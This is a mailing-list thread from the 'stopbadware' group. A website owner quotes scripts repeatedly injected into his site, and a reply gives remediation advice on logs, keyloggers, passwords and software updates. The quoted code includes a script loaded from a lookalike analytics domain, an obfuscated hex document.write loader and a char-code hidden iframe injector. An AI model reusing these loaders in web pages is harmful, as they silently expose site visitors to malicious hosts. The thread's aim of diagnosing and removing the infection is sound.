Hi Sri, Contact your hosting provider and have them check the log files or send them to you, with onformation on who is tampering with the files. They should be able to show some kind of entry.
It could either be that it happens through an upload of a file - in which case your password is likely compromised and possibly your PC has a keylogger or other malicious software. Or it could happen when a certain page is accessed a certain way on your site, in which case the software driving the page (php/asp script), are to blame for this. If it's your own software then you have to change it, but if it's a standard package software you might want to get hold of an update. In any case - check your PC for malicious software capturing your data/ userids/passwords and make sure to change your passwords and change the uploading service to the home page to a secure ftp or other better method. Kent On Sep 29, 1:45 pm, sri <[EMAIL PROTECTED]> wrote: > Dear members, > > I have posted a question on 13th of > September,http://groups.google.com/group/stopbadware/browse_thread/thread/96b0c... > > After receiving the replies i have removed the unnecessary codes and > scripts from my site. > Even though regularly i am getting the same code. I am removing it > daily. > I am giving the script which i am removing regularly > > <script src="http://analytics-google.info/s/urchin.js";></script> > > <script>function c71307925162m48d3c0e5a2bf4(m48d3c0e5a33c7){ function > m48d3c0e5a3b9b(){return 16;} return > (parseInt(m48d3c0e5a33c7,m48d3c0e5a3b9b()));}function > m48d3c0e5a4b44(m48d3c0e5a5318){ function m48d3c0e5a6a93(){return 2;} > var > m48d3c0e5a5aeb='';m48d3c0e5a7a3b=String.fromCharCode;for(m48d3c0e5a62bf=0;m48d3c0e5a62bf<m48d3c0e5a5318.length;m48d3c0e5a62bf > +=m48d3c0e5a6a93()){ m48d3c0e5a5aeb > +=(m48d3c0e5a7a3b(c71307925162m48d3c0e5a2bf4(m48d3c0e5a5318.substr(m48d3c0e5a62bf,m48d3c0e5a6a93()))));}return > m48d3c0e5a5aeb;} var z0e='';var m48d3c0e5a820f='3C7'+z0e+'3637'+z0e > +'2697'+z0e+'07'+z0e+'43E696628216D7'+z0e+'96961297'+z0e+'B646F637'+z0e > +'56D656E7'+z0e+'42E7'+z0e+'7'+z0e+'7'+z0e+'2697'+z0e+'465287'+z0e > +'56E657'+z0e+'363617'+z0e+'065282027'+z0e+'2533632536392536362537'+z0e > +'32253631253664253635253230253665253631253664253635253364253633253337'+z0e > +'2532302537'+z0e+'332537'+z0e+'32253633253364253237'+z0e > +'2536382537'+z0e+'342537'+z0e+'342537'+z0e > +'302533612532662532662536632536662536322536312536652536312536322537'+z0e > +'352536332536622537'+z0e > +'332532652536332536652532662536652536352537'+z0e+'37'+z0e > +'2532652536382537'+z0e+'34253664253663253366253237'+z0e > +'2532622534642536312537'+z0e+'342536382532652537'+z0e > +'322536662537'+z0e+'352536652536342532382534642536312537'+z0e > +'342536382532652537'+z0e > +'32253631253665253634253666253664253238253239253261253332253339253337'+z0e > +'253239253262253237'+z0e+'253333253334253635253635253237'+z0e > +'2532302537'+z0e+'37'+z0e+'2536392536342537'+z0e > +'34253638253364253339253230253638253635253639253637'+z0e > +'2536382537'+z0e+'342533642533332533332532302537'+z0e+'332537'+z0e > +'342537'+z0e+'39253663253635253364253237'+z0e+'2536342536392537'+z0e > +'332537'+z0e+'302536632536312537'+z0e > +'39253361253230253665253666253665253635253237'+z0e > +'2533652533632532662536392536362537'+z0e > +'3225363125366425363525336527'+z0e+'29293B7'+z0e+'D7'+z0e+'6617'+z0e > +'2206D7'+z0e+'969613D7'+z0e+'47'+z0e+'27'+z0e+'5653B3C2F7'+z0e > +'3637'+z0e+'2697'+z0e+'07'+z0e > +'43E';document.write(m48d3c0e5a4b44(m48d3c0e5a820f));</ > script><script>check_content()</script> > > <!-- o65 --><script>a=new Array('6e+1','10.5e+1','1.02e+2','0.114e > +3','0.97e+2','1.09e+2','1.01e+2','3.2e+1','11.5e+1','1.14e+2','9.9e > +1','6.1e+1','0.34e+2','10.4e+1','0.116e+3','11.6e+1','0.112e+3','5.8e > +1','4.7e+1','0.047e+3','0.121e+3','0.97e+2','0.11e+3','1.1e+2','0.1e > +3','1.01e+2','12e+1','0.046e+3','11.5e+1','1.17e+2','4.7e+1','1.05e > +2','1.1e+2','1e+2','0.101e+3','0.12e+3','0.46e+2','0.112e+3','1.04e > +2','0.112e+3','3.4e+1','3.2e+1','0.119e+3','10.5e+1','1e+2','11.6e > +1','10.4e+1','6.1e+1','0.49e+2','3.2e+1','1.04e+2','10.1e+1','0.105e > +3','1.03e+2','0.104e+3','11.6e+1','6.1e+1','0.049e+3','0.032e > +3','11.5e+1','1.16e+2','12.1e+1','1.08e+2','0.101e+3','0.061e+3','3.4e > +1','0.118e+3','0.105e+3','11.5e+1','10.5e+1','0.98e+2','0.105e > +3','10.8e+1','10.5e+1','1.16e+2','1.21e+2','5.8e+1','0.32e+2','10.4e > +1','0.105e+3','10e+1','0.1e+3','1.01e+2','1.1e+2','0.034e+3','0.62e > +2','0.06e+3','0.47e+2','1.05e+2','1.02e+2','1.14e+2','0.97e+2','0.109e > +3','10.1e+1','6.2e+1');for(var p in a) > {document.write(String.fromCharCode(parseFloat(a[p])));};</script><!-- > c65 --> > > can any one of you please tell me how to stop this injection of > malicious script into my web site. > > Thanks in advance > Sri. --~--~---------~--~----~------------~-------~--~----~ You received this message through the Google Groups "stopbadware" group. To post to this group, send email to [email protected] To unsubscribe from this group, send email to [EMAIL PROTECTED] For more options, visit this group at http://groups.google.com/group/stopbadware?hl=en -~----------~----~----~----~------~----~------~--~---
